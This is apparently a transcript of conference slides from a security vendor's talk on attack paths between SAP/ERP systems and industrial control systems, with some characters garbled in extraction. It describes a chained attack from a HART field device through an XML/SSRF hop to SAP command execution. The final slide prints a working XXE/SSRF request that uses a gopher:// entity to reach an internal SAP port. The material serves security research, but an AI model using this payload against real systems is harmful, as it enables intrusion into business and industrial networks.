Thermo Scientific Dionex ICS-1100, ICS-1600, and ICS-2100 Systems
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Transcript of Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Invest in security to secure investments
Business Breakdown Vulnerabili1es in ERP via ICS and ICS via ERP
Alexander Polyakov CTO ERPScan, President EAS-‐SEC
About ERPScan
• The only 360-‐degree SAP Security solu1on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta=ons key security conferences worldwide • 25 Awards and nomina=ons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
How do they look like
3
3
Portal
HR
BW ECC
Billing
Suppliers
Customers
Banks
Insurance
Partners
Branches
BI
IS CRM
PAS/ EAS
MES
SRM
SCADA/DCS
OPC
PLC’s Field Devices
SolMan SAP AS
XI/PI
How popular they are
SAP • More than 246000 customers worldwide • 86% of Forbes 500 Oracle • 100% of Fortune 100 Microso^ • More than 300,000 businesses worldwide choose Microso^
Dynamics ERP and CRM so^ware
4
• Espionage – The^ of Financial Informa1on – Trade Secret the^ – Supplier and Customer list the^ – HR data the^ – Other Corporate Data the^
• Sabotage – Denial of service – Modifica1on of financial statements – Access to technology network (SCADA/ICS) by trust rela=ons
• Fraud – False transac1ons – Modifica1on of master data
5
What can happen
How do they look like
6
6
Portal
HR
BW ECC
Billing
Suppliers
Customers
Banks
Insurance
Partners
Branches
BI
IS CRM
PAS/ EAS
MES
SRM
SCADA/DCS
OPC
PLC’s Field Devices
SolMan SAP AS
XI/PI
How easy is that
Systems should be connected with each other • Directly
– ERP collects informa1on from PAS/EAS
• Indirectly – ERP shares database with MES/EAS – ERP is connected with ICS/SCADA via XI or PI system
• In one network – Exploit typical vulnerabili1es of password sniffing
• In different networks – Exploit trust rela1ons
7
Internet to Internal
• Via Internet resources (SAP Portal/CRM/SRP) • Via Partners (SAP XI) • Via SAP Router • Via Worksta1ons (Trojans) • Via Unnecessary SAP Services in Internet
8
How to break SAP?
At least: • Unnecessary privileges • Misconfigura1ons • Vulnerabili1es • Custom code issues
9
Unnecessary privileges
• One example: Create vendor + Approve Payment order • Usually ((~100 Roles X 10 ac1ons)^2)/2=500k • 500k poten1al conflicts for each user! • A lot of work • Usually takes two years to decrease conflicts from millions to
hundreds.
10
Misconfigura=ons
~1500 profile parameters ~1200 Web-‐applica1ons ~700 webservices ~100 specific commands for mmc ~100 specific checks for each of the 50 modules
11
1. Lack of patch management 2. Default passwords 3. Unnecessary enabled func1onality 4. Remotely enabled administra1ve services 5. Insecure configura1on 6. Unencrypted communica1ons 7. Internal access control and SoD 8. Insecure trust rela1ons 9. Monitoring of security events
12
Misconfigura=ons
13
Only one vulnerability is enough to get access to ALL business-‐cri1cal DATA
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014
By July 2014 – 3000+ notes
Vulnerabili=es
From ERP to ICS
Some systems should be connected at least on the network layer. • SAP RFC links • Database links • Same Domain • Similar passwords
!TRUST CONNECTIONS – main issue
14
From ICS/Devices to ERP
• USB (like Stuxnet) • Wireless devices (Usually bad encryp1on) • Wired devices (need physical access) • Aoack on Wire (low level field protocols)
– RS485 – Profibus PA – FF H1 – HART
16
How do they look like
18
18
Portal
HR
BW ECC
Billing
Suppliers
Customers
Banks
Insurance
Partners
Branches
BI
IS CRM
PAS/ EAS
MES
SRM
SCADA/DCS
OPC
PLC’s Field Devices
SolMan SAP AS
XI/PI
From ICS to ERP
19
Corporate network ERP
MES
PLC2,3… PLC1
PLC7,8… Field devices
Routers/Firewalls
OPC SCADA/DCS
HMI
Industrial bus
From ICS to ERP
20
• HART (current loop, 4-‐20 mA) • Mostly used on power plants, chemical factories, oil & gas
industry • Every field device (in general, every device) in PAS industrial
facility hierarchy has a unique ID • For HART devices, HART long tag is used as an universal ID • HART tag (8 bytes packed ASCII) and HART long tag (32 bytes
ASCII) are used as applica1on layer address
Vulnerabili=es
21
DEMO Infrastructure Corporate network
ERP
Transmioer
Firewall (only HTTP traffic allowed)
FieldCare (PAS)
Current loop (HART Analog 4-‐20mA line)
Ethernet
HART modem
A\ack Scheme
23
Current loop
HART gateway/master
XML data
HART Command 22 Long tag change packet
A' xmlns='x-schema:http://q45.ru Aoacker
HART transmioer
XMLI Evil web server
Request for remote XSD schema
Reply (XSD with SSRF) SSRF
1 2
3
4
5 Internet
PAS (FieldCare)
6 SAP remote command execu1on exploit query
RCE J
ERP
From ERP to ICS
• SSRF hop://cwe.mitre.org/data/defini1ons/918.html • Second place in Top 10 web applica1on techniques 2012 • Allows to bypass firewall restric1ons and directly connect to
protected systems via connected systems
24
SSRF
25
Server B (ERP, HR, BW etc.)
Server A (Portal or XI)
192.168.0.1
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 192.168.0.1:8000 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo>
AAAAAAAAAAAAA
Port 3300
telnet 172.16.0.1 3300